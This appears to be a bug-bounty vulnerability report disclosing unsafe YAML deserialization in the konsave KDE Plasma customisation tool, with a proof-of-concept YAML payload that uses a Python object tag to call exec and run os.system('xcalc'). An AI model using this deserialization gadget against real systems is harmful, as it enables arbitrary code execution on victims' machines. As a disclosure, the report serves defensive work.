Code Injection in prayag2/konsave
Valid
Reported on
Mar 10th 2021
✍️ Description
konsave
is a CLI program that will let you save and apply your KDE Plasma customizations with just one command , which is vulnerable to YAML deserialization attack
caused by unsafe loading leads to Arbitary Code Execution
.
🕵️♂️ Proof of Concept
Installation
pip install konsave
conf.yaml
payload = """cmd: !!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('xcalc')"
"""
now copy conf.yaml and paste in konsave directory
Run the command below
konsave -s test
This will create a profile along with it code execution will occur
💥 Impact
Arbitary Code Execution
to join this conversation